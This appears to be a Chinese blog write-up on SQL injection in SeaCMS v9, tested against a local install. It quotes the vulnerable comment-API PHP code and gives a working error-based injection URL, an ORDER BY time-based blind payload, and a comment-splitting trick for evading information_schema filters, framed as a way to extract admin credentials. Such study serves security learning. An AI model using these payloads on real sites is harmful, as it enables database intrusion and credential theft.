当前位置: 首页 > news >正文

seacmsv9报错注入管理员账号密码,order by 注入,如何解决 information_schema关键字被过滤掉了

news 来源:原创 2025/5/17 23:36:58

seacmsv9报错注入管理员账号密码

后端代码

<?php
session_start();
require_once("../../include/common.php");
$id = (isset($gid) && is_numeric($gid)) ? $gid : 0;
$page = (isset($page) && is_numeric($page)) ? $page : 1;
$type = (isset($type) && is_numeric($type)) ? $type : 1;
$pCount = 0;
$jsoncachefile = sea_DATA."/cache/review/$type/$id.js";
if($page<2)
{
	if(file_exists($jsoncachefile))
	{
		$json=LoadFile($jsoncachefile);
		die($json);
	}
}
$h = ReadData($id,$page);
$rlist = array();
if($page<2)
{
	createTextFile($h,$jsoncachefile);
}
die($h);	
 
 
function ReadData($id,$page)
{
	global $type,$pCount,$rlist;
	$ret = array("","",$page,0,10,$type,$id);
	if($id>0)
	{
		$ret[0] = Readmlist($id,$page,$ret[4]);
		$ret[3] = $pCount;
		$x = implode(',',$rlist);
		if(!empty($x))
		{
		$ret[1] = Readrlist($x,1,10000);
		}
	}	
	$readData = FormatJson($ret);
	return $readData;
}
 
function Readmlist($id,$page,$size)
{
	global $dsql,$type,$pCount,$rlist;
	$ml=array();
	if($id>0)
	{
		$sqlCount = "SELECT count(*) as dd FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC";
		$rs = $dsql ->GetOne($sqlCount);
		$pCount = ceil($rs['dd']/$size);
		$sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC limit ".($page-1)*$size.",$size ";
		$dsql->setQuery($sql);
		$dsql->Execute('commentmlist');
		while($row=$dsql->GetArray('commentmlist'))
		{
			$row['reply'].=ReadReplyID($id,$row['reply'],$rlist);
			$ml[]="{\"cmid\":".$row['id'].",\"uid\":".$row['uid'].",\"tmp\":\"\",\"nick\":\"".$row['username']."\",\"face\":\"\",\"star\":\"\",\"anony\":".(empty($row['username'])?1:0).",\"from\":\"".$row['username']."\",\"time\":\"".date("Y/n/j H:i:s",$row['dtime'])."\",\"reply\":\"".$row['reply']."\",\"content\":\"".$row['msg']."\",\"agree\":".$row['agree'].",\"aginst\":".$row['anti'].",\"pic\":\"".$row['pic']."\",\"vote\":\"".$row['vote']."\",\"allow\":\"".(empty($row['anti'])?0:1)."\",\"check\":\"".$row['ischeck']."\"}";
		}
	}
	$readmlist=join($ml,",");
	return $readmlist;
}
 
function Readrlist($ids,$page,$size)
{
	global $dsql,$type;
	$rl=array();
	$sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND id in ($ids) ORDER BY id DESC";
	$dsql->setQuery($sql);
	$dsql->Execute('commentrlist');
	while($row=$dsql->GetArray('commentrlist'))
	{
		$rl[]="\"".$row['id']."\":{\"uid\":".$row['uid'].",\"tmp\":\"\",\"nick\":\"".$row['username']."\",\"face\":\"\",\"star\":\"\",\"anony\":".(empty($row['username'])?1:0).",\"from\":\"".$row['username']."\",\"time\":\"".$row['dtime']."\",\"reply\":\"".$row['reply']."\",\"content\":\"".$row['msg']."\",\"agree\":".$row['agree'].",\"aginst\":".$row['anti'].",\"pic\":\"".$row['pic']."\",\"vote\":\"".$row['vote']."\",\"allow\":\"".(empty($row['anti'])?0:1)."\",\"check\":\"".$row['ischeck']."\"}";
	}
	$readrlist=join($rl,",");
	return $readrlist;
}
 
function ReadReplyID($gid,$cmid,&$rlist)
{
	global $dsql;
	if($cmid>0)
	{
		if(!in_array($cmid,$rlist))$rlist[]=$cmid;
		$row = $dsql->GetOne("SELECT reply FROM sea_comment WHERE id=$cmid limit 0,1");
		if(is_array($row))
		{
			$ReplyID = ",".$row['reply'].ReadReplyID($gid,$row['reply'],$rlist);
		}else
		{
			$ReplyID = "";
		}
	}else
	{
		$ReplyID = "";
	}
	return $ReplyID;
}
 
function FormatJson($json)
{
	$x = "{\"mlist\":[%0%],\"rlist\":{%1%},\"page\":{\"page\":%2%,\"count\":%3%,\"size\":%4%,\"type\":%5%,\"id\":%6%}}";
	for($i=6;$i>=0;$i--)
	{
		$x=str_replace("%".$i."%",$json[$i],$x);
	}
	$formatJson = jsonescape($x);
	return $formatJson;
}
 
function jsonescape($txt)
{
	$jsonescape=str_replace(chr(13),"",str_replace(chr(10),"",json_decode(str_replace("%u","\u",json_encode("".$txt)))));
	return $jsonescape;
}

报错注入

http://127.0.0.1/upload9.1/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20user()))),@`%27`

绕过过滤order by

使用时间盲注

ORDER BY IF((SELECT SUBSTR(table_name,1,1) FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1)='a',SLEEP(5),1);

绕过过滤information_schema

关键字分割 用空格换行符或特殊字符来分割information_schema以达到绕过过滤的作用

SELECT table_name FROM information/**/_schema.tables WHERE table_schema=DATABASE();

相关文章:

  • AF3 _make_msa_df函数解读
  • Java语言Leetcode中常用的一些基础语法
  • 【洛谷贪心算法题】P1094纪念品分组
  • (八)Java-Collection
  • Ray生产集群配置
  • 图像处理基础(8):图像的灰度直方图、直方图均衡化、直方图规定化(匹配)
  • 目标检测YOLO实战应用案例100讲-面向无人机图像的小目标检测
  • 1.2.2 使用Maven方式构建Spring Boot项目
  • GPT1 与 GPT2 的异同
  • 数字内容体验案例分析的核心优势是什么?
  • 【Python pro】函数
  • 处理AAL的.nii文件:python获取AAL的各个区域的质心坐标
  • Go红队开发—语法补充
  • 同价位usb网卡与pcie网卡网速差距实测 热点测试
  • JavaScript 简单类型与复杂类型-复杂类型的内存分配
  • 智慧隧道与智慧城市融合发展——塔能物联运维的持之以恒
  • 同步fifo和异步fifo
  • ARM架构各版本内核处理器总结
  • 线程安全问题
  • Hadoop最新版本hadoop-3.4.1搭建伪分布式集群以及相关报错解决
  • 蒲慕明院士:未来数十年不是AI取代人,而是会用AI的人取代不会用的
  • 首次带人形机器人走科技节红毯,傅利叶顾捷:没太多包袱,很多事都能从零开始
  • 试点首发进口消费品检验便利化措施,上海海关与上海商务委发文
  • 竞彩湃|欧联杯决赛前,曼联、热刺继续划水?
  • 跨越三十年友情,61岁余隆和60岁齐默尔曼在上海再度合作
  • 再现五千多年前“古国时代”:凌家滩遗址博物馆今开馆